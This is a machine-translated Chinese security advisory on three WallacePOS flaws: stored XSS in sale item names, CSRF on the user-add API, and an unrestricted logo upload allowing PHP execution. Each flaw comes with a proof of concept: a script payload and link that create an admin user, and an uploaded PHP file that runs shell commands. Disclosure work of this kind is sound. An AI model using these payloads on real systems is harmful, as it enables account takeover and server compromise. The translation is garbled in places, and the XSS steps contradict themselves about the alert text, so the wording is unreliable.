WallacePOS多个漏洞

cve - 2019 - 3958: / api /销售/添加销售物品的名称验证持续的跨站点脚本

一个持久的跨站点脚本漏洞被发现的出售物品的名称,直到事务/ api /销售/添加端点。这个漏洞需要利用用户交互成功。这个漏洞可以授予一个攻击者与普通用户权限可以执行任何操作授权管理员。

这个漏洞是由于缺乏输入验证销售事务名/ api /销售/添加端点。不输入存储在服务器上的应用程序数据库,随后向客户发送请求信息时出售。这个领域也显示,unsanitized应用程序管理员报告。

概念验证

1. 作为一个正常的“员工”用户登录WallacePOS https使用应用程序登录页面:<服务器> /。
2. 点击“到”,然后“添加”。在Name列添加下面的脚本(确保您127.0.0.1替换服务器IP):

   • <脚本>警报(“添加乔。”);$ . get (" https://127.0.0.1/api/users/add?data=%7B%22username%22%3A%22joe%22%2C%22pass%22%3A%22022c22c21fc47dda38e12228c1e69fbc6a9e18d9d3478927091ca4145d641862%22%2C%22admin%22%3A1%7D "); > < /脚本

3. 添加一个单价,然后单击“过程”。
4. 完成销售通过点击“现金”,然后“完整”。
5. 选择“取消”当被问及打印收据。
6. 退出应用程序,作为WallacePOS admin用户重新登录。
7. 点击“销售”,找到你刚才添加的事务,然后单击“视图”。
8. 注意,一个JavaScript警告显示文本“xss”。

cve - 2019 - 3959:跨站点请求伪造

跨站点请求伪造(XSRF)脆弱性WallacePOS 3允许远程攻击者和受害者的权限执行操作的用户,提供了用户有一个活跃的会话和受害者感应触发恶意请求。

例如,攻击者可以说服受害者WallacePOS用户点击一个链接,点击时,会导致一个新用户被添加。

这个漏洞是造成因为浏览器执行请求时自动包括会话cookie。因此,如果受害人用户经过身份验证的网站,这个网站不能区分伪造或合法请求发送的受害者。

请注意,这个漏洞可以结合跨站点脚本漏洞自动执行敏感的应用程序操作。

概念验证

(注意,必须更换IP地址与IP WallacePOS实例。)

下面的PoC的URL将创建一个名为“乔”的用户密码的“笨蛋”。如果这个链接发送到用户有足够特权受害者,然后点击,用户将创建“乔”。

https://127.0.0.1/api/users/add?data=%7B%22username%22%3A%22joe%22%2C%22pass%22%3A%22022c22c21fc47dda38e12228c1e69fbc6a9e18d9d3478927091ca4145d641862%22%2C%22admin%22%3A1%7D

cve - 2019 - 3960:验证无限制的文件上传远端控制设备

一个无限制的文件上传漏洞WallacePOS允许远程用户认证管理服务器上执行任意的PHP代码在web服务器进程的上下文中。身份验证管理用户可以浏览到https: /管理/ # !possettings,选择“浏览器/电子邮件标志”上传小部件,向服务器上传任何文件类型。可以上传一个PHP反向壳牌和访问www - data给一个默认的输入主机作为服务器配置。

概念验证

1. 在本地机器上,创建一个名为“whoami.php”的文件。保存文件包含以下内容:

   • < ?php echo exec (“whoami”);? >

2. 作为管理员登录WallacePOS。
3. 到“设置”页面。然后浏览到“POS设置”。
4. “浏览器/电子邮件标志”选择你的whoami。php文件。点击底部的“保存”。
5. 在浏览器中访问https://127.0.0.1/docs/whoami.php。(一定要替换相应的IP地址)。
6. www - data的结果可能会是“(无论用户web服务器正在运行)。